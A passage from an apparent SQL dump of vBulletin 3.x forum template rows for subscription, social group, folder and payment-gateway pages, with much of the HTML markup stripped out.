    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n
    \r\n\r\n\r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n\r\n', 'template', 1219749641, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1608, -1, 'socialgroups_subscribe', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n \r\n
    session->vars[\'sessionurl\'] . \"\\\" method=\\\"post\\\" name=\\\"vbform\\\">\r\n\".(($discussion[\'discussionid\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[subscribe_to_discussion]: $discussion[title]\r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[notification_type]\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n \r\n
    \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[subscribe_to_discussion]: $discussion[title]\r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[notification_type]\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1214237106, 'vBulletin Solutions', '3.7.1', 'vbulletin'), (1609, -1, 'socialgroups_subscribe_group', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n \r\n
    session->vars[\'sessionurl\'] . \"\\\" method=\\\"post\\\" name=\\\"vbform\\\">\r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[subscribe_to_this_group]: $group[name]\r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[notification_type]\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n \r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[subscribe_to_this_group]: $group[name]\r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[notification_type]\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1234791867, 'vBulletin Solutions', '3.8.2', 'vbulletin'), (1610, -1, 'socialgroups_subscriptions', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\".((!$totaldiscussions) ? (\"\r\n \r\n \r\n \r\n\") : (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $discussionbits\r\n \r\n\")).\"\r\n
    \r\n $vbphrase[subscribed_discussions]\r\n
    \r\n \".(($totaldiscussions) ? (\"\r\n
    \r\n $vbphrase[selected_discussions]:\r\n $gobutton\r\n
    \r\n \") : (\"\r\n
    \r\n \")).\"\r\n
    \r\n $vbphrase[you_have_no_subscribed_discussions]\r\n
    \r\n $vbphrase[discussion]\r\n $vbphrase[group_created] $sortarrow[dateline]\r\n \r\n $vbphrase[replies] $sortarrow[replies]\r\n \r\n $vbphrase[last_post] $sortarrow[lastpost]\r\n \r\n $vbphrase[notification] $sortarrow[subscription]\r\n \r\n \r\n
    \r\n
    \r\n\r\n\".(($pagenav) ? (\"\r\n
    \r\n
    \r\n $pagenav\r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n\".(($group_subscribe_list) ? (\"\r\n
    \r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n$group_subscribe_list\r\n\r\n\r\n
    \r\n $vbphrase[subscribed_social_groups]\r\n
    \r\n
    \r\n $vbphrase[selected_groups]:\r\n $gobutton\r\n
    \r\n
    \r\n $vbphrase[group_name]\r\n \r\n $vbphrase[last_post]\r\n \r\n $vbphrase[notification]\r\n \r\n \r\n
    \r\n\r\n
    \r\n\") : (\"\")).\"', '
    \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $discussionbits\r\n \r\n\r\n
    \r\n $vbphrase[subscribed_discussions]\r\n
    \r\n \r\n
    \r\n $vbphrase[selected_discussions]:\r\n $gobutton\r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n $vbphrase[you_have_no_subscribed_discussions]\r\n
    \r\n $vbphrase[discussion]\r\n $vbphrase[group_created] $sortarrow[dateline]\r\n \r\n $vbphrase[replies] $sortarrow[replies]\r\n \r\n $vbphrase[last_post] $sortarrow[lastpost]\r\n \r\n $vbphrase[notification] $sortarrow[subscription]\r\n \r\n \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n
    \r\n $pagenav\r\n
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n$group_subscribe_list\r\n\r\n\r\n
    \r\n $vbphrase[subscribed_social_groups]\r\n
    \r\n
    \r\n $vbphrase[selected_groups]:\r\n $gobutton\r\n
    \r\n
    \r\n $vbphrase[group_name]\r\n \r\n $vbphrase[last_post]\r\n \r\n $vbphrase[notification]\r\n \r\n \r\n
    \r\n\r\n
    \r\n
    ', 'template', 1234874971, 'vBulletin Solutions', '3.8.2', 'vbulletin'), (1611, -1, 'socialgroups_transfer', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle\r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n \r\n \r\n \r\n \r\n \".((!$targetuser) ? (\"\r\n \r\n \r\n \r\n \") : (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \")).\"\r\n
    $vbphrase[transfer_group_ownership]
    \r\n
    \r\n
    \r\n
    \r\n \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n
    \r\n $vbphrase[transfer_group_ownership]\r\n $vbphrase[transfer_group_ownership_info]\r\n

    \r\n \".(($error) ? (\"\r\n
    \\\"\\\" $error
    \r\n \") : (\"\")).\"\r\n $vbphrase[transfer_to_user]\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n \" . construct_phrase(\"$vbphrase[group_ownership_transfer_request_sent_to_x]\", \"$userinfo[userid]\", \"$userinfo[username]\") . \"\r\n
    \r\n
    \r\n \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $custompagetitle\r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[transfer_group_ownership]
    \r\n
    \r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n\r\n
    \r\n $vbphrase[transfer_group_ownership]\r\n $vbphrase[transfer_group_ownership_info]\r\n

    \r\n \r\n
    \"\" $error
    \r\n
    \r\n $vbphrase[transfer_to_user]\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n $vbphrase[group_ownership_transfer_request_sent_to_x]\r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n', 'template', 1237458769, 'vBulletin Solutions', '3.8.2', 'vbulletin'), (1612, -1, 'SUBSCRIBE', '\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[subscribed_threads_in_folder]: \".(($show[\'allfolders\']) ? (\"$vbphrase[all]\") : (\"$folder\")).\" \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[folder_controls]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[jump_to_folder]:
    \r\n $gobutton\r\n
    \r\n session->vars[\'sessionurl\'] . \"do=viewsubscription&daysprune=-1&folderid=all\\\">$vbphrase[view_all_subscribed_threads] |\r\n session->vars[\'sessionurl\'] . \"do=editfolders\\\">$vbphrase[edit_folders] | session->vars[\'sessionurl\'] . \"do=emptyfolder&folderid=$folderid\\\">$vbphrase[empty_current_folder]\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\".(($show[\'pagenav\']) ? (\"\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n\") : (\"\")).\"\r\n\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\".(($show[\'havethreads\']) ? (\"\r\n\r\n \".(($show[\'threadicons\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n$threadbits\r\n\r\n \r\n\r\n\") : (\"\r\n \r\n \r\n \r\n\")).\"\r\n
    \r\n $vbphrase[threads]: $totalallthreads\r\n $vbphrase[subscribed_threads_in_folder]: \".(($show[\'allfolders\']) ? (\"$vbphrase[all]\") : (\"$folder\")).\" \r\n
      \r\n $vbphrase[thread] $sortarrow[title] /\r\n $vbphrase[thread_starter] $sortarrow[postusername]\r\n $vbphrase[last_post] $sortarrow[lastpost]$vbphrase[notification]
    \r\n\r\n $vbphrase[selected_threads]:\r\n $gobutton\r\n\r\n
    \r\n
    \r\n $vbphrase[folder_is_currently_empty]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\".(($show[\'pagenav\']) ? (\"\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \".(($GLOBALS[\'vbulletin\']->options[\'usehotthreads\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n \r\n \r\n \".(($show[\'dotthreads\']) ? (\"\r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
    \\\"$vbphrase[new_posts]\\\"$vbphrase[new_posts]
    \\\"$vbphrase[no_new_posts]\\\"$vbphrase[no_new_posts]
    \\\"$vbphrase[hot_thread_with_new_posts]\\\"\" . construct_phrase(\"$vbphrase[more_than_x_replies_or_y_views]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'hotnumberposts\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'hotnumberviews\'] . \"\") . \"
    \\\"$vbphrase[hot_thread_with_no_new_posts]\\\"\" . construct_phrase(\"$vbphrase[more_than_x_replies_or_y_views]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'hotnumberposts\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'hotnumberviews\'] . \"\") . \"
    \\\"$vbphrase[closed_thread]\\\"$vbphrase[thread_is_closed]
    \\\"$vbphrase[thread_contains_a_message_written_by_you]\\\"$vbphrase[you_have_posted_in_this_thread]
    \r\n \r\n
    $forumjump
    \r\n', '\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n
    \r\n \"\"\r\n $vbphrase[subscribed_threads_in_folder]: $vbphrase[all]$folder \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[folder_controls]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[jump_to_folder]:
    \r\n $gobutton\r\n
    \r\n $vbphrase[view_all_subscribed_threads] |\r\n $vbphrase[edit_folders] | $vbphrase[empty_current_folder]\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n
    \r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n$threadbits\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n $vbphrase[threads]: $totalallthreads\r\n $vbphrase[subscribed_threads_in_folder]: $vbphrase[all]$folder \r\n
      \r\n $vbphrase[thread] $sortarrow[title] /\r\n $vbphrase[thread_starter] $sortarrow[postusername]\r\n $vbphrase[last_post] $sortarrow[lastpost]$vbphrase[notification]
    \r\n\r\n $vbphrase[selected_threads]:\r\n $gobutton\r\n\r\n
    \r\n
    \r\n $vbphrase[folder_is_currently_empty]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \"$vbphrase[new_posts]\"$vbphrase[new_posts]
    \"$vbphrase[no_new_posts]\"$vbphrase[no_new_posts]
    \"$vbphrase[hot_thread_with_new_posts]\"$vbphrase[more_than_x_replies_or_y_views]
    \"$vbphrase[hot_thread_with_no_new_posts]\"$vbphrase[more_than_x_replies_or_y_views]
    \"$vbphrase[closed_thread]\"$vbphrase[thread_is_closed]
    \"$vbphrase[thread_contains_a_message_written_by_you]\"$vbphrase[you_have_posted_in_this_thread]
    \r\n \r\n
    $forumjump
    \r\n', 'template', 1220364796, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1613, -1, 'subscribe_choosetype', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'subscribetothread\']) ? (\"\r\n $vbphrase[subscribe_to_thread]: $threadinfo[prefix_plain_html] $threadinfo[title]\r\n \") : (\"\r\n $vbphrase[subscribe_to_forum]: $foruminfo[title]\r\n \")).\"\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \".(($show[\'folders\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
    \r\n $vbphrase[notification_type]:
    \r\n \r\n
    \r\n $vbphrase[folder]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \r\n $vbphrase[subscribe_to_thread]: $threadinfo[prefix_plain_html] $threadinfo[title]\r\n \r\n $vbphrase[subscribe_to_forum]: $foruminfo[title]\r\n \r\n
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[notification_type]:
    \r\n \r\n
    \r\n $vbphrase[folder]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1213713538, 'vBulletin Solutions', '3.7.1', 'vbulletin'), (1614, -1, 'subscribe_confirm_delete', '
    \r\n \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[empty_current_folder]
    $vbphrase[are_you_sure_you_want_to_delete_these_subscriptions]
    \r\n \r\n \r\n
    \r\n
    ', '
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[empty_current_folder]
    $vbphrase[are_you_sure_you_want_to_delete_these_subscriptions]
    \r\n \r\n \r\n
    \r\n
    ', 'template', 1220365028, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1615, -1, 'subscribe_folderbit', '\r\n $vbphrase[folder_name]
    \r\n\r\n', '\r\n $vbphrase[folder_name]
    \r\n\r\n', 'template', 1070096688, 'vBulletin Solutions', '', 'vbulletin'), (1616, -1, 'subscribe_move', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[move_subscribed_threads]
    \r\n
    \r\n
    \r\n\r\n
    \r\n \" . construct_phrase(\"$vbphrase[move_x_items_from_y]\", \"$numthreads\", \"$fromfolder\") . \"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[select_destination_folder_for_move]
    \r\n $vbphrase[folder_name]:
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[move_subscribed_threads]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[move_x_items_from_y]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[select_destination_folder_for_move]
    \r\n $vbphrase[folder_name]:
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1208876083, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1617, -1, 'subscribe_showfolders', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[edit_folders]
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'customfolders\']) ? (\"\r\n
    \r\n $vbphrase[your_folders]\r\n \r\n $folderboxes\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[to_rename_a_folder]
    \" . construct_phrase(\"$vbphrase[to_delete_a_folder_subs]\", \"$defaultfolder\") . \"
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n $vbphrase[add_new_folders]\r\n \r\n $newfolderboxes\r\n \r\n \r\n \r\n
    $vbphrase[to_add_a_new_folder]
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[edit_folders]
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[your_folders]\r\n \r\n $folderboxes\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[to_rename_a_folder]
    $vbphrase[to_delete_a_folder_subs]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[add_new_folders]\r\n \r\n $newfolderboxes\r\n \r\n \r\n \r\n
    $vbphrase[to_add_a_new_folder]
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1208876065, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1618, -1, 'subscription', '\".(($show[\'activesubscriptions\']) ? (\"\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n$subscribedbits\r\n
    $vbphrase[active_subscriptions]
    $vbphrase[subscription_title]$vbphrase[start_date]$vbphrase[expiry_date]
    \r\n
    \r\n\") : (\"\")).\"\r\n\".(($show[\'subscriptions\']) ? (\"\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[available_subscriptions]
    \r\n
    \r\n
    \r\n\r\n $subscriptionbits\r\n\r\n
    \r\n $vbphrase[validity_periods_marked_indicate]\r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\") : (\"\")).\"', '\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n$subscribedbits\r\n
    $vbphrase[active_subscriptions]
    $vbphrase[subscription_title]$vbphrase[start_date]$vbphrase[expiry_date]
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[available_subscriptions]
    \r\n
    \r\n
    \r\n\r\n $subscriptionbits\r\n\r\n
    \r\n $vbphrase[validity_periods_marked_indicate]\r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    ', 'template', 1208876049, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1619, -1, 'subscription_activebit', '\r\n $subscription[title]\r\n $joindate\r\n $enddate\r\n', '\r\n $subscription[title]\r\n $joindate\r\n $enddate\r\n', 'template', 1069828812, 'vBulletin Solutions', '', 'vbulletin'), (1620, -1, 'subscription_availablebit', '
    \r\n $subscription[title]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $subscription[title]
    \r\n $subscription[description]\r\n
     \r\n
    \r\n $vbphrase[cost]:
    \r\n \r\n \r\n
    \r\n
    ', '
    \r\n $subscription[title]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $subscription[title]
    \r\n $subscription[description]\r\n
     \r\n
    \r\n $vbphrase[cost]:
    \r\n \r\n \r\n
    \r\n
    ', 'template', 1121974038, 'vBulletin Solutions', '3.5.0 Release Candidate 1', 'vbulletin'), (1621, -1, 'subscription_payment', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[select_payment_method]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[to_pay_for_your_subscription]\r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[subscription]:$subscription_title
    $vbphrase[duration]:$subscription_length
    $vbphrase[cost]:$subscription_cost
    \r\n
    \r\n\r\n $orderbits\r\n\r\n
    \r\n
    \r\n
    ', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[select_payment_method]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[to_pay_for_your_subscription]\r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[subscription]:$subscription_title
    $vbphrase[duration]:$subscription_length
    $vbphrase[cost]:$subscription_cost
    \r\n
    \r\n\r\n $orderbits\r\n\r\n
    \r\n
    \r\n
    ', 'template', 1125401481, 'vBulletin Solutions', '3.5.0 Release Candidate 3', 'vbulletin'), (1622, -1, 'subscription_paymentbit', '
    \r\n
    \r\n \" . construct_phrase(\"$vbphrase[order_using_x]\", \"{$vbphrase[$method[classname]]}\") . \"\r\n
    \r\n
    $vbphrase[$typetext]
    \r\n
    \r\n $form[hiddenfields]\r\n \r\n
    \r\n
    \r\n
    \r\n
    ', '
    \r\n
    \r\n $vbphrase[order_using_x]\r\n
    \r\n
    $vbphrase[$typetext]
    \r\n
    \r\n $form[hiddenfields]\r\n $vbphrase[order_using_x]\" />\r\n
    \r\n
    \r\n
    \r\n
    ', 'template', 1119630159, 'vBulletin Solutions', '3.5.0 Beta 3', 'vbulletin'), (1623, -1, 'subscription_payment_2checkout', '\r\n\r\n\r\n\r\n', '\r\n\r\n\r\n\r\n', 'template', 1170440078, 'vBulletin Solutions', '3.6.6', 'vbulletin'), (1624, -1, 'subscription_payment_authorizenet', '\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\noptions[\'bburl\'] . \"/payment_gateway.php?method=authorizenet\\\" />', '\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n$vbphrase[x_subscription]\" />\r\n\r\n', 'template', 1168864955, 'vBulletin Solutions', '3.6.6', 'vbulletin'), (1625, -1, 'subscription_payment_ccbill', '\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n', '\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n', 'template', 1146784809, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'), (1626, -1, 'subscription_payment_moneybookers', '\r\n\r\n\r\n\r\noptions[\'bburl\'] . \"/\" . $GLOBALS[\'vbulletin\']->options[\'forumhome\'] . \".php\\\" />\r\noptions[\'bburl\'] . \"/\" . $GLOBALS[\'vbulletin\']->options[\'forumhome\'] . \".php\\\" />\r\noptions[\'bburl\'] . \"/payment_gateway.php?method=moneybookers\\\" />\r\n\r\n', '\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n', 'template', 1123594101, 'vBulletin Solutions', '3.5.0 Release Candidate 3', 'vbulletin'), (1627, -1, 'subscription_payment_nochex', '\r\n\r\n\r\noptions[\'bburl\'] . \"\\\" />\r\noptions[\'bburl\'] . \"/payment_gateway.php?method=nochex\\\" />', '\r\n\r\n\r\n\r\n', 'template', 1170869888, 'vBulletin Solutions', '3.6.6', 'vbulletin'), (1628, -1, 'subscription_payment_paypal', '\".(($show[\'recurring\']) ? (\"\r\n\r\n\") : (\"\r\n\r\n\")).\"\r\n\r\n\r\n\r\n\r\n\".(($show[\'recurring\']) ? (\"\r\n\r\n\r\n\r\n\r\n\r\n\") : (\"\r\n\r\n\")).\"\r\n\r\n\r\noptions[\'bburl\'] . \"/\" . $GLOBALS[\'vbulletin\']->options[\'forumhome\'] . \".php\\\" />\r\noptions[\'bburl\'] . \"/\" . $GLOBALS[\'vbulletin\']->options[\'forumhome\'] . \".php\\\" />\r\noptions[\'bburl\'] . \"/payment_gateway.php?method=paypal\\\" />\r\n\r\n\r\n\".(($show[\'notax\']) ? (\"\r\n\r\n\") : (\"\")).\"', '\r\n\r\n\r\n\r\n\r\n\r\n$vbphrase[x_subscription]\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n', 'template', 1168864939, 'vBulletin Solutions', '3.6.6', 'vbulletin'), (1629, -1, 'subscription_payment_worldpay', '\r\n\r\n\r\n\r\n', '\r\n\r\n\r\n\r\n$vbphrase[x_subscription]\" />', 'template', 1168864913, 'vBulletin Solutions', '3.6.6', 'vbulletin'), (1630, -1, 'tagbit', 'session->vars[\'sessionurl\'] . \"tag=$tag_url\\\">$tag', '$tag', 'template', 1196350380, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1631, -1, 'tagbit_wrapper', '\".(($tag_list) ? (\"$tag_list\") : (\"$vbphrase[none]\")).\" \\\"\\\"', '$tag_list$vbphrase[none] \"\"', 'template', 1196437543, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1632, -1, 'tag_cloud_box', '\r\n\r\n 